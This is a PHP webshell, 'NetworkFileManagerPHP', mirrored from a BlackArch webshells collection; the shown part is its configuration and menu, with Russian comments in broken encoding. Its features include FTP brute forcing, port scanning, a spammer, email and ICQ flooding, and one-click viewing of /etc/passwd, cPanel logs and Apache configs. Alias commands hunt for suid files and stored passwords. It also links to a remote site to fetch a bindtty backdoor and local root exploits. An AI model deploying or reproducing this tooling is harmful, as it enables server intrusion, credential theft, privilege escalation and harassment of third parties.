mirror of
https://github.com/BlackArch/webshells
synced 2024-11-22 11:53:05 +00:00
3086 lines
129 KiB
PHP
3086 lines
129 KiB
PHP
<?
|
|
error_reporting(5);
|
|
/*
|
|
$use_md5=0; // êðèïòîâàòü ïàðîëü ïî md5 èëè íåò? //
|
|
$uname="nfm";
|
|
$upass="q1w2e3";
|
|
|
|
|
|
if (isset($PHP_AUTH_USER) && ($PHP_AUTH_USER==$uname)) {
|
|
if ($use_md5) {
|
|
if (md5($PHP_AUTH_PW) != $upass) { Header('WWW-Authenticate: Basic realm="'.$title.'"');Header('HTTP/1.0 401 Unauthorized');exit; }
|
|
} else {
|
|
if ($PHP_AUTH_PW != $upass) { Header('WWW-Authenticate: Basic realm="'.$title.'"');Header('HTTP/1.0 401 Unauthorized');exit; }
|
|
}
|
|
} else {
|
|
Header('WWW-Authenticate: Basic realm="'.$title.'"');
|
|
Header('HTTP/1.0 401 Unauthorized');
|
|
exit;
|
|
} */
|
|
if ($action != "download" && $action != "view" ):
|
|
?>
|
|
|
|
<?
|
|
|
|
/* Âàøå ìûëî äëÿ îòïðàâêè ôàéëîâ, óêàæèòå ñâîå*/
|
|
$demail ="âàøå ìûëî";
|
|
|
|
/* ïîø¸ë êîíôèã */
|
|
$title="NetworkFileManagerPHP";
|
|
$ver="1.8.private (beta)";
|
|
$sob="Cîáñòâåííîñòü <b><u>channel #hack.ru</u></b>";
|
|
$id="0000001";
|
|
|
|
/* FTP-áðóò */
|
|
$filename="/etc/passwd";
|
|
$ftp_server="localhost";
|
|
/* ñêàíåð ïîðòîâ */
|
|
$min="1";
|
|
$max="65535";
|
|
|
|
/* Àëèàñû */
|
|
$aliases=array(
|
|
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */
|
|
'find / -type f -perm -04000 -ls' => 'find all suid files' ,
|
|
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */
|
|
'find / -type f -perm -02000 -ls' => 'find all sgid files',
|
|
/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */
|
|
'find / -type f -name config.inc.php' => 'find config.inc.php files',
|
|
/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
|
|
'find / -perm -2 -ls' => 'find writable directories and files',
|
|
'ls -la' => '---------------------------------------------------------',
|
|
'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password'
|
|
);
|
|
|
|
/* Ïîðòû ñ íàèìåíîâàíèÿìè */
|
|
$port[1] = "tcpmux (TCP Port Service Multiplexer)";
|
|
$port[2] = "Management Utility";
|
|
$port[3] = "Compression Process";
|
|
$port[5] = "rje (Remote Job Entry)";
|
|
$port[7] = "echo";
|
|
$port[9] = "discard";
|
|
$port[11] = "systat";
|
|
$port[13] = "daytime";
|
|
$port[15] = "netstat";
|
|
$port[17] = "quote of the day";
|
|
$port[18] = "send/rwp";
|
|
$port[19] = "character generator";
|
|
$port[20] = "ftp-data";
|
|
$port[21] = "ftp";
|
|
$port[22] = "ssh, pcAnywhere";
|
|
$port[23] = "Telnet";
|
|
$port[25] = "SMTP (Simple Mail Transfer)";
|
|
$port[27] = "ETRN (NSW User System FE)";
|
|
$port[29] = "MSG ICP";
|
|
$port[31] = "MSG Authentication";
|
|
$port[33] = "dsp (Display Support Protocol)";
|
|
$port[37] = "time";
|
|
$port[38] = "RAP (Route Access Protocol)";
|
|
$port[39] = "rlp (Resource Location Protocol)";
|
|
$port[41] = "Graphics";
|
|
$port[42] = "nameserv, WINS";
|
|
$port[43] = "whois, nickname";
|
|
$port[44] = "MPM FLAGS Protocol";
|
|
$port[45] = "Message Processing Module [recv]";
|
|
$port[46] = "MPM [default send]";
|
|
$port[47] = "NI FTP";
|
|
$port[48] = "Digital Audit Daemon";
|
|
$port[49] = "TACACS, Login Host Protocol";
|
|
$port[50] = "RMCP, re-mail-ck";
|
|
$port[53] = "DNS";
|
|
$port[57] = "MTP (any private terminal access)";
|
|
$port[59] = "NFILE";
|
|
$port[60] = "Unassigned";
|
|
$port[61] = "NI MAIL";
|
|
$port[62] = "ACA Services";
|
|
$port[63] = "whois++";
|
|
$port[64] = "Communications Integrator (CI)";
|
|
$port[65] = "TACACS-Database Service";
|
|
$port[66] = "Oracle SQL*NET";
|
|
$port[67] = "bootps (Bootstrap Protocol Server)";
|
|
$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
|
|
$port[69] = "Trivial File Transfer Protocol (tftp)";
|
|
$port[70] = "Gopher";
|
|
$port[71] = "Remote Job Service";
|
|
$port[72] = "Remote Job Service";
|
|
$port[73] = "Remote Job Service";
|
|
$port[74] = "Remote Job Service";
|
|
$port[75] = "any private dial out service";
|
|
$port[76] = "Distributed External Object Store";
|
|
$port[77] = "any private RJE service";
|
|
$port[78] = "vettcp";
|
|
$port[79] = "finger";
|
|
$port[80] = "World Wide Web HTTP";
|
|
$port[81] = "HOSTS2 Name Serve";
|
|
$port[82] = "XFER Utility";
|
|
$port[83] = "MIT ML Device";
|
|
$port[84] = "Common Trace Facility";
|
|
$port[85] = "MIT ML Device";
|
|
$port[86] = "Micro Focus Cobol";
|
|
$port[87] = "any private terminal link";
|
|
$port[88] = "Kerberos, WWW";
|
|
$port[89] = "SU/MIT Telnet Gateway";
|
|
$port[90] = "DNSIX Securit Attribute Token Map";
|
|
$port[91] = "MIT Dover Spooler";
|
|
$port[92] = "Network Printing Protocol";
|
|
$port[93] = "Device Control Protocol";
|
|
$port[94] = "Tivoli Object Dispatcher";
|
|
$port[95] = "supdup";
|
|
$port[96] = "DIXIE";
|
|
$port[98] = "linuxconf";
|
|
$port[99] = "Metagram Relay";
|
|
$port[100] = "[unauthorized use]";
|
|
$port[101] = "HOSTNAME";
|
|
$port[102] = "ISO, X.400, ITOT";
|
|
$port[103] = "Genesis Point-to㝀ƭoi T��ns��et";
|
|
$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
|
|
$port[105] = "CCSO name server protocol";
|
|
$port[106] = "poppassd";
|
|
$port[107] = "Remote Telnet Service";
|
|
$port[108] = "SNA Gateway Access Server";
|
|
$port[109] = "POP2";
|
|
$port[110] = "POP3";
|
|
$port[111] = "Sun RPC Portmapper";
|
|
$port[112] = "McIDAS Data Transmission Protocol";
|
|
$port[113] = "Authentication Service";
|
|
$port[115] = "sftp (Simple File Transfer Protocol)";
|
|
$port[116] = "ANSA REX Notify";
|
|
$port[117] = "UUCP Path Service";
|
|
$port[118] = "SQL Services";
|
|
$port[119] = "NNTP";
|
|
$port[120] = "CFDP";
|
|
$port[123] = "NTP";
|
|
$port[124] = "SecureID";
|
|
$port[129] = "PWDGEN";
|
|
$port[133] = "statsrv";
|
|
$port[135] = "loc-srv/epmap";
|
|
$port[137] = "netbios-ns";
|
|
$port[138] = "netbios-dgm (UDP)";
|
|
$port[139] = "NetBIOS";
|
|
$port[143] = "IMAP";
|
|
$port[144] = "NewS";
|
|
$port[150] = "SQL-NET";
|
|
$port[152] = "BFTP";
|
|
$port[153] = "SGMP";
|
|
$port[156] = "SQL Service";
|
|
$port[161] = "SNMP";
|
|
$port[175] = "vmnet";
|
|
$port[177] = "XDMCP";
|
|
$port[178] = "NextStep Window Server";
|
|
$port[179] = "BGP";
|
|
$port[180] = "SLmail admin";
|
|
$port[199] = "smux";
|
|
$port[210] = "Z39.50";
|
|
$port[213] = "IPX";
|
|
$port[218] = "MPP";
|
|
$port[220] = "IMAP3";
|
|
$port[256] = "RAP";
|
|
$port[257] = "Secure Electronic Transaction";
|
|
$port[258] = "Yak Winsock Personal Chat";
|
|
$port[259] = "ESRO";
|
|
$port[264] = "FW1_topo";
|
|
$port[311] = "Apple WebAdmin";
|
|
$port[350] = "MATIP type A";
|
|
$port[351] = "MATIP type B";
|
|
$port[363] = "RSVP tunnel";
|
|
$port[366] = "ODMR (On-Demand Mail Relay)";
|
|
$port[371] = "Clearcase";
|
|
$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
|
|
$port[389] = "LDAP";
|
|
$port[407] = "Timbuktu";
|
|
$port[427] = "Server Location";
|
|
$port[434] = "Mobile IP";
|
|
$port[443] = "ssl";
|
|
$port[444] = "snpp, Simple Network Paging Protocol";
|
|
$port[445] = "SMB";
|
|
$port[458] = "QuickTime TV/Conferencing";
|
|
$port[468] = "Photuris";
|
|
$port[475] = "tcpnethaspsrv";
|
|
$port[500] = "ISAKMP, pluto";
|
|
$port[511] = "mynet-as";
|
|
$port[512] = "biff, rexec";
|
|
$port[513] = "who, rlogin";
|
|
$port[514] = "syslog, rsh";
|
|
$port[515] = "lp, lpr, line printer";
|
|
$port[517] = "talk";
|
|
$port[520] = "RIP (Routing Information Protocol)";
|
|
$port[521] = "RIPng";
|
|
$port[522] = "ULS";
|
|
$port[531] = "IRC";
|
|
$port[543] = "KLogin, AppleShare over IP";
|
|
$port[545] = "QuickTime";
|
|
$port[548] = "AFP";
|
|
$port[554] = "Real Time Streaming Protocol";
|
|
$port[555] = "phAse Zero";
|
|
$port[563] = "NNTP over SSL";
|
|
$port[575] = "VEMMI";
|
|
$port[581] = "Bundle Discovery Protocol";
|
|
$port[593] = "MS-RPC";
|
|
$port[608] = "SIFT/UFT";
|
|
$port[626] = "Apple ASIA";
|
|
$port[631] = "IPP (Internet Printing Protocol)";
|
|
$port[635] = "RLZ DBase";
|
|
$port[636] = "sldap";
|
|
$port[642] = "EMSD";
|
|
$port[648] = "RRP (NSI Registry Registrar Protocol)";
|
|
$port[655] = "tinc";
|
|
$port[660] = "Apple MacOS Server Admin";
|
|
$port[666] = "Doom";
|
|
$port[674] = "ACAP";
|
|
$port[687] = "AppleShare IP Registry";
|
|
$port[700] = "buddyphone";
|
|
$port[705] = "AgentX for SNMP";
|
|
$port[901] = "swat, realsecure";
|
|
$port[993] = "s-imap";
|
|
$port[995] = "s-pop";
|
|
$port[1024] = "Reserved";
|
|
$port[1025] = "network blackjack";
|
|
$port[1062] = "Veracity";
|
|
$port[1080] = "SOCKS";
|
|
$port[1085] = "WebObjects";
|
|
$port[1227] = "DNS2Go";
|
|
$port[1243] = "SubSeven";
|
|
$port[1338] = "Millennium Worm";
|
|
$port[1352] = "Lotus Notes";
|
|
$port[1381] = "Apple Network License Manager";
|
|
$port[1417] = "Timbuktu Service 1 Port";
|
|
$port[1418] = "Timbuktu Service 2 Port";
|
|
$port[1419] = "Timbuktu Service 3 Port";
|
|
$port[1420] = "Timbuktu Service 4 Port";
|
|
$port[1433] = "Microsoft SQL Server";
|
|
$port[1434] = "Microsoft SQL Monitor";
|
|
$port[1477] = "ms-sna-server";
|
|
$port[1478] = "ms-sna-base";
|
|
$port[1490] = "insitu-conf";
|
|
$port[1494] = "Citrix ICA Protocol";
|
|
$port[1498] = "Watcom-SQL";
|
|
$port[1500] = "VLSI License Manager";
|
|
$port[1503] = "T.120";
|
|
$port[1521] = "Oracle SQL";
|
|
$port[1522] = "Ricardo North America License Manager";
|
|
$port[1524] = "ingres";
|
|
$port[1525] = "prospero";
|
|
$port[1526] = "prospero";
|
|
$port[1527] = "tlisrv";
|
|
$port[1529] = "oracle";
|
|
$port[1547] = "laplink";
|
|
$port[1604] = "Citrix ICA, MS Terminal Server";
|
|
$port[1645] = "RADIUS Authentication";
|
|
$port[1646] = "RADIUS Accounting";
|
|
$port[1680] = "Carbon Copy";
|
|
$port[1701] = "L2TP/LSF";
|
|
$port[1717] = "Convoy";
|
|
$port[1720] = "H.323/Q.931";
|
|
$port[1723] = "PPTP control port";
|
|
$port[1731] = "MSICCP";
|
|
$port[1755] = "Windows Media .asf";
|
|
$port[1758] = "TFTP multicast";
|
|
$port[1761] = "cft-0";
|
|
$port[1762] = "cft-1";
|
|
$port[1763] = "cft-2";
|
|
$port[1764] = "cft-3";
|
|
$port[1765] = "cft-4";
|
|
$port[1766] = "cft-5";
|
|
$port[1767] = "cft-6";
|
|
$port[1808] = "Oracle-VP2";
|
|
$port[1812] = "RADIUS server";
|
|
$port[1813] = "RADIUS accounting";
|
|
$port[1818] = "ETFTP";
|
|
$port[1973] = "DLSw DCAP/DRAP";
|
|
$port[1985] = "HSRP";
|
|
$port[1999] = "Cisco AUTH";
|
|
$port[2001] = "glimpse";
|
|
$port[2049] = "NFS";
|
|
$port[2064] = "distributed.net";
|
|
$port[2065] = "DLSw";
|
|
$port[2066] = "DLSw";
|
|
$port[2106] = "MZAP";
|
|
$port[2140] = "DeepThroat";
|
|
$port[2301] = "Compaq Insight Management Web Agents";
|
|
$port[2327] = "Netscape Conference";
|
|
$port[2336] = "Apple UG Control";
|
|
$port[2427] = "MGCP gateway";
|
|
$port[2504] = "WLBS";
|
|
$port[2535] = "MADCAP";
|
|
$port[2543] = "sip";
|
|
$port[2592] = "netrek";
|
|
$port[2727] = "MGCP call agent";
|
|
$port[2628] = "DICT";
|
|
$port[2998] = "ISS Real Secure Console Service Port";
|
|
$port[3000] = "Firstclass";
|
|
$port[3001] = "Redwood Broker";
|
|
$port[3031] = "Apple AgentVU";
|
|
$port[3128] = "squid";
|
|
$port[3130] = "ICP";
|
|
$port[3150] = "DeepThroat";
|
|
$port[3264] = "ccmail";
|
|
$port[3283] = "Apple NetAssitant";
|
|
$port[3288] = "COPS";
|
|
$port[3305] = "ODETTE";
|
|
$port[3306] = "mySQL";
|
|
$port[3389] = "RDP Protocol (Terminal Server)";
|
|
$port[3521] = "netrek";
|
|
$port[4000] = "icq, command-n-conquer and shell nfm";
|
|
$port[4321] = "rwhois";
|
|
$port[4333] = "mSQL";
|
|
$port[4444] = "KRB524";
|
|
$port[4827] = "HTCP";
|
|
$port[5002] = "radio free ethernet";
|
|
$port[5004] = "RTP";
|
|
$port[5005] = "RTP";
|
|
$port[5010] = "Yahoo! Messenger";
|
|
$port[5050] = "multimedia conference control tool";
|
|
$port[5060] = "SIP";
|
|
$port[5150] = "Ascend Tunnel Management Protocol";
|
|
$port[5190] = "AIM";
|
|
$port[5500] = "securid";
|
|
$port[5501] = "securidprop";
|
|
$port[5423] = "Apple VirtualUser";
|
|
$port[5555] = "Personal Agent";
|
|
$port[5631] = "PCAnywhere data";
|
|
$port[5632] = "PCAnywhere";
|
|
$port[5678] = "Remote Replication Agent Connection";
|
|
$port[5800] = "VNC";
|
|
$port[5801] = "VNC";
|
|
$port[5900] = "VNC";
|
|
$port[5901] = "VNC";
|
|
$port[6000] = "X Windows";
|
|
$port[6112] = "BattleNet";
|
|
$port[6502] = "Netscape Conference";
|
|
$port[6667] = "IRC";
|
|
$port[6670] = "VocalTec Internet Phone, DeepThroat";
|
|
$port[6699] = "napster";
|
|
$port[6776] = "Sub7";
|
|
$port[6970] = "RTP";
|
|
$port[7007] = "MSBD, Windows Media encoder";
|
|
$port[7070] = "RealServer/QuickTime";
|
|
$port[7777] = "cbt";
|
|
$port[7778] = "Unreal";
|
|
$port[7648] = "CU-SeeMe";
|
|
$port[7649] = "CU-SeeMe";
|
|
$port[8000] = "iRDMI/Shoutcast Server";
|
|
$port[8010] = "WinGate 2.1";
|
|
$port[8080] = "HTTP";
|
|
$port[8181] = "HTTP";
|
|
$port[8383] = "IMail WWW";
|
|
$port[8875] = "napster";
|
|
$port[8888] = "napster";
|
|
$port[8889] = "Desktop Data TCP 1";
|
|
$port[8890] = "Desktop Data TCP 2";
|
|
$port[8891] = "Desktop Data TCP 3: NESS application";
|
|
$port[8892] = "Desktop Data TCP 4: FARM product";
|
|
$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
|
|
$port[8894] = "Desktop Data TCP 6: COAL application";
|
|
$port[9000] = "CSlistener";
|
|
$port[10008] = "cheese worm";
|
|
$port[11371] = "PGP 5 Keyserver";
|
|
$port[13223] = "PowWow";
|
|
$port[13224] = "PowWow";
|
|
$port[14237] = "Palm";
|
|
$port[14238] = "Palm";
|
|
$port[18888] = "LiquidAudio";
|
|
$port[21157] = "Activision";
|
|
$port[22555] = "Vocaltec Web Conference";
|
|
$port[23213] = "PowWow";
|
|
$port[23214] = "PowWow";
|
|
$port[23456] = "EvilFTP";
|
|
$port[26000] = "Quake";
|
|
$port[27001] = "QuakeWorld";
|
|
$port[27010] = "Half-Life";
|
|
$port[27015] = "Half-Life";
|
|
$port[27960] = "QuakeIII";
|
|
$port[30029] = "AOL Admin";
|
|
$port[31337] = "Back Orifice";
|
|
$port[32777] = "rpc.walld";
|
|
$port[45000] = "Cisco NetRanger postofficed";
|
|
$port[32773] = "rpc bserverd";
|
|
$port[32776] = "rpc.spray";
|
|
$port[32779] = "rpc.cmsd";
|
|
$port[38036] = "timestep";
|
|
$port[40193] = "Novell";
|
|
$port[41524] = "arcserve discovery";
|
|
|
|
/* îïöèè êîí÷èëèñü, ïîø¸ë äèçàéí */
|
|
$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">";
|
|
$style=<<<style
|
|
<style>
|
|
a.menu {
|
|
color: #ffffcc;
|
|
text-decoration:none;
|
|
font-family: Times New Roman;
|
|
font-weight: bold;
|
|
}
|
|
a.menu:hover {
|
|
color: #FF0000;
|
|
font-family: Times New Roman;
|
|
text-decoration: none
|
|
font-weight: bold;
|
|
}
|
|
a {
|
|
color: #000000;
|
|
text-decoration:none;
|
|
font-family: Tahoma;
|
|
font-size: 11px;
|
|
}
|
|
a:hover {
|
|
color: #184984;
|
|
font-family: Tahoma;
|
|
text-decoration: underline
|
|
font-size: 11px;
|
|
}
|
|
td.up{
|
|
color: #996600;
|
|
font-family: Verdana;
|
|
font-weight: normal;
|
|
font-size: 11px;
|
|
}
|
|
.pagetitle {
|
|
font-family: Arial, Helvetica, sans-serif;
|
|
color: #FFFFFF;
|
|
text-decoration: none;
|
|
font-size: 12px
|
|
}
|
|
.alert {
|
|
color: #FF0000;
|
|
font-family: Tahoma;
|
|
font-size: 11px;
|
|
}
|
|
.button1 {
|
|
font-size:11px;
|
|
font-weight:bold;
|
|
font-family:Verdana;
|
|
background:#184984;
|
|
border:1px solid #000000; cursor:hand; color:#ffffcc;
|
|
}
|
|
.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal}
|
|
.submit_button { font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;}
|
|
.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid}
|
|
b { font-weight: bold}
|
|
table { font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984}
|
|
</style>
|
|
style;
|
|
|
|
/* ñòèëè òàáëèö */
|
|
$style1=<<<table
|
|
STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
|
|
table;
|
|
$style2=<<<table_file
|
|
STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
|
|
table_file;
|
|
$style3=<<<table_dir
|
|
STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'"
|
|
table_dir;
|
|
$style4=<<<table_files
|
|
STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'"
|
|
table_files;
|
|
$style_button=<<<button
|
|
STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
|
|
button;
|
|
$style_open=<<<open
|
|
STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"
|
|
open;
|
|
$style_close=<<<close
|
|
STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'"
|
|
close;
|
|
$ins=<<<ins
|
|
<script>
|
|
function ins(text){
|
|
document.hackru.chars_de.value+=text;
|
|
document.hackru.chars_de.focus();
|
|
}
|
|
</script>
|
|
ins;
|
|
|
|
/* Ôîðìà îòïðàâêè*/
|
|
$form = "
|
|
<br> <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr>
|
|
<td align=center class=pagetitle colspan=2><b>Âîïðîñû ïî ñêðèïòó NetworkFileManagerPHP</b></font></b></td>
|
|
</tr> <form method='POST' action='$PHP_SELF?action=feedback&status=ok'>
|
|
<tr>
|
|
<td colspan=2 align=center class=pagetitle><b>Îáðàòíàÿ ñâÿçü:</b></td>
|
|
</tr>
|
|
<tr>
|
|
<td width='250' class=pagetitle><b>Âàøå èìÿ:</b></td>
|
|
<td width='250' class=pagetitle>
|
|
<input type='text' name='name' size='40' class='inputbox'></td>
|
|
</tr>
|
|
<tr>
|
|
<td width='250' class=pagetitle><b>Email:</b></td>
|
|
<td width='250'><input type='text' name='email' size='40' class='inputbox'></td>
|
|
</tr>
|
|
|
|
<tr>
|
|
<td colspan=2 align=center class=pagetitle><b>
|
|
Âàøè âîïðîñû è ïîæåëàíèÿ:
|
|
</b></font></b></td>
|
|
</tr>
|
|
<tr>
|
|
<td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr>
|
|
<tr>
|
|
<td align=right><input type='submit' value='Äàâè' name='B1' class=button1 $style_button></td>
|
|
<td align=left><input type='reset' value='Î÷èñòèòü' name='B2' class=button1 $style_button></td>
|
|
</tr>
|
|
</form></table><br>
|
|
";
|
|
|
|
|
|
|
|
/* Ôîðìà HTML */
|
|
$HTML=<<<html
|
|
<html>
|
|
<head>
|
|
<title>$title $ver</title>
|
|
$meta
|
|
$style
|
|
$ins
|
|
</head>
|
|
|
|
<body bgcolor=#E0F7FF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center colspan=6 class=pagetitle><b>NetworkFileManagerPHP (© #hack.ru)</b> Âåðñèÿ: <b>$ver</b> </td></tr>
|
|
<tr><td align=center colspan=6 class=pagetitle bgcolor=#76A8AB>Ñêðèïò äëÿ àäìèíèñòðèðîâàíèÿ ñâîåãî ñàéòà è íå òîëüêî...</td></tr>
|
|
<tr>
|
|
<td class=pagetitle align=center width='85%'><font color=#76A8AB><b>Ïîìîùü ïî ñêðèïòó:</b></font></td>
|
|
<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF'>.:Home</a> </td>
|
|
<td $style2 align=center width='15%' ><a class=menu href="http://hackru.info">.:#hack.ru</a> </td>
|
|
<td $style2 align=center width='15%'><a class=menu href = '$PHP_SELF?action=feedback'>.:Âîïðîñû</a> </td>
|
|
<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=help'>.:Îïèñàíèå</a> </td>
|
|
<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=update'>.:Îáíîâëåíèÿ</a> </td>
|
|
</tr>
|
|
|
|
<tr>
|
|
<td class=pagetitle align=center width='85%' ><font color=#FFFF99><b>Ñåòåâîé ñîôò:</b></font></td>
|
|
<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=portscan'>.:Ñêàí ïîðòîâ</a> </td>
|
|
<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=ftp'>.:Áðóòåð ÔÒÏ</a> </td>
|
|
<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=tar'>.:Àðõèâàöèÿ ïàïîê</a> </td>
|
|
<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=sql'>.:Äàìï Mysql</a> </td>
|
|
<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=del'>.:Óäàëèòü NFM</a> </td>
|
|
</tr>
|
|
<tr>
|
|
<td class=pagetitle align=center width='85%' ><font color=#9BD09B><b>Äîñòóï ê ýêñïëîéòàì:</b></font></td>
|
|
<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=bash'>.:îòêðûòü øåë</a> </td>
|
|
<td $style_open align=center width='15%' colspan=3><a class=menu href='$PHP_SELF?action=exploits'>.:Explots</a> </td>
|
|
<tr>
|
|
<td class=pagetitle align=center width='85%'><font color=#AB879C><b>Õàêåðñêèé ñîôò:</b></font></td>
|
|
<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=crypte'>.:Øèôðîâêà</a> </td>
|
|
<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=decrypte'>.:Ðàñøèôðîâêà</a> </td>
|
|
<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=brut_ftp'>.:Full access FTP</a> </td>
|
|
<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=spam'>.:Ñïàìåð</a> </td>
|
|
<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=down'>.:Óäàëåííàÿ çàãðóçêà</a> </td>
|
|
</tr>
|
|
<td class=pagetitle align=center width=85%><font color=#FF3300><b>Ñîôò íàêàçàíèÿ:</b></font></td>
|
|
<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=flud'>.:Ôëóä Email</a> </td>
|
|
<td $style2 align=center width='15%' colspan=3><a class=menu href='$PHP_SELF?action=fludicq'>.:Ôëóä ICQ</a> </td>
|
|
<tr>
|
|
<tr>
|
|
<td class=pagetitle align=center width='85%' colspan=6 bgcolor=#76A8AB>$sob ID:<u><b>$id</b></u></td>
|
|
</tr>
|
|
<tr>
|
|
<td $style2 align=center width='15%' colspan=2><a class=menu href="$PHP_SELF?tm=/etc&fi=passwd&action=view">.:etc/passwd</a> </td>
|
|
<td $style2 align=center width='15%' ><a class=menu href = '$PHP_SELF?tm=/var/cpanel&fi=accounting.log&action=view'>.:cpanel log</a> </td>
|
|
<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/usr/local/apache/conf&fi=httpd.conf&action=view'>.:httpd.conf[1]</a> </td>
|
|
<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/etc/httpd&fi=httpd.conf&action=view'>.:httpd.conf[2]</a> </td>
|
|
<td $style2 align=center width='15%' ><a class=menu href='http://hackru.info/bugtraq'>.:Bugtraq</td>
|
|
|
|
</tr>
|
|
</table>
|
|
html;
|
|
/* çàäàåì ðàíäîìíûå íàçâàíèÿ ôàéëîâ àðõèâàöèè*/
|
|
$CHARS = "abcdefghijklmnopqrstuvwxyz";
|
|
for ($i=0; $i<6; $i++) $pass .= $CHARS[rand(0,strlen($CHARS)-1)];
|
|
|
|
/* çàäàåì ïóòü ê ñàéòó, ãäå ëåæàò ïóáëè÷íûå ýêñïëîéòû*/
|
|
$public_site = "http://hackru.info/adm/exploits/public_exploits/";
|
|
/* $public_site = "http://localhost/adm/public_exploits/"; */
|
|
/* Ïóáëè÷íûå ýêñïëîéòû */
|
|
$public[1] = "s"; // øåë
|
|
$title_ex[1] = "
|
|
bindtty.c - óäàëåííûé øåë ñ ïðàâàìè apache, äàííûé áàêäîð óæå ñêîìïèëèðîâàí è íàñòðîåí íà 4000 ïîðò<br>
|
|
<dd><b>Çàïóñê:</b> ./s<br>
|
|
Êîíåêòèòñÿ ëó÷øå òåëíåò êëèåíòîì ñàìûå ëó÷øèå ýòî <u><b>putty</b></u> è <u><b>SecureCRT</b></u>
|
|
";
|
|
$public[2] = "m"; // ìðåìàï
|
|
$title_ex[2] = "
|
|
MREMAP - ïîçâîëÿåò ïîëó÷èòü ëîêàëüíî ïðèâèëåãèè ROOT, èñïîëüçóåò ïåðåïîëíåíèå ïàìÿòè.<br>
|
|
<dd><b>Çàïóñê:</b> ./m<br>
|
|
Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
|
|
";
|
|
$public[3] = "p"; // ptrace
|
|
$title_ex[3] = "
|
|
PTRACE - ñòàðûé äîáðûé ýêñïëîéò, ðàáîòàåò òàêæå êàê è mremap<br>
|
|
<dd><b>Çàïóñê:</b> ./p<br>
|
|
Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
|
|
";
|
|
$public[4] = "psyBNC2.3.2-4.tar.gz"; // psybnc
|
|
$title_ex[4] = "
|
|
psyBNC - ïîñëåäíÿÿ âåðñèÿ, ïîïóëÿðíîãî áàóí÷åðà äëÿ IRC<br>
|
|
<dd><b>Ðàçàðõèâàöèÿ:</b> tar -zxf psyBNC2.3.2-4.tar.gz // ïîÿâèòñÿ ïàïêà <u>psybnc</u><br>
|
|
<dd><b>Âõîä è çàïóñê:</b> make // óñòàíàâëèâàåì íà äàííóþ îñü psybnc // ./psybnc // ìîæíî ïîìåíÿòü êîíôèã ñ ïîìîùüþ nfm<br>
|
|
Ìîæíî çàïóñêàòü ñ ïðàâàìè àïà÷à!!! Òîëüêî ñìîòðèòå ÷òîáû íå áûëî ôàåðâîëà!!!
|
|
";
|
|
/* Ïðèâàòíûå ýêñïëîéòû */
|
|
$private[1] = "brk"; // localroot root linux 2.4.*
|
|
$title_exp[1] = "
|
|
localroot root linux 2.4.* - ïðèâàòíûé ñïëîéò, äàþùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ðàáîòàåò òàêæå êàê è mremap<br>
|
|
<dd><b>Çàïóñê:</b> ./brk<br>
|
|
